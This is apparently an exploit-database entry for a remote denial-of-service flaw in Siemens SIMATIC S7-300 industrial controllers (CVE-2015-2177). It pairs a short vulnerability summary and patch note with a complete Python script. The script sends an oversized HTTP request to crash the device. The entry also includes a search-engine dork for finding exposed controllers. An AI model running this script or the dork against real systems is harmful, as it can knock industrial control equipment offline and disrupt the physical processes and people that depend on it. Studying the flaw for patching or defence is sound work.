header-logo
Suggest Exploit
vendor:
SIMATIC S7-300 CPU family
by:
t4rkd3vilz
7.5
CVSS
HIGH
Remote Denial Of Service
20
CWE
Product Name: SIMATIC S7-300 CPU family
Affected Version From: all versions
Affected Version To: all versions
Patch Exists: YES
Related CWE: CVE-2015-2177
CPE: h:siemens:simatic_s7-300_cpu_family
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

Siemens SIMATIC S7-300 CPU – Remote Denial Of Service

A vulnerability in Siemens SIMATIC S7-300 CPU family could allow a remote attacker to cause a denial of service condition on the targeted system. An attacker could send a specially crafted HTTP request containing an overly long string to the targeted system. An exploit could allow the attacker to cause the system to become unresponsive, resulting in a denial of service condition.

Mitigation:

Siemens has released a security update to address this vulnerability. Users are advised to apply the necessary updates.
Source

Exploit-DB raw data:

# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-30
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-300 CPU family: all versions.
# Tested on: Kali Linux
# CVE: CVE-2015-2177

#!/usr/bin/python
import socket

target_address="TargetIP"
target_port=80

buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()